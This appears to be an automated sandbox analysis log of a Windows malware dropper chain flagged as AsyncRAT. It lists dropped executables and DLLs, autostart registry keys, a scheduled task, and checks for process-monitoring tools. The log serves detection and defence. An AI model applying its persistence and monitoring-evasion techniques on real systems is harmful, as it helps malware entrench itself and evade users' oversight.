Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023287001\98f8ef74ec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023282001\7d66ff7c35.exe	Jump to dropped file
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File created: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023283001\4f6ebb22d5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023285001\fe4b3524c6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UfEglUg[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ukX1YE2[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File created: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\projectspecificpro[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nnmp[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1023288001\fd096224d5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1008664001\nnmp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[5].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.skotes.exe.9d0e9d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28c520debd.exe
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28c520debd.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 28c520debd.exe

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process information set: NOOPENFILEERRORBOX
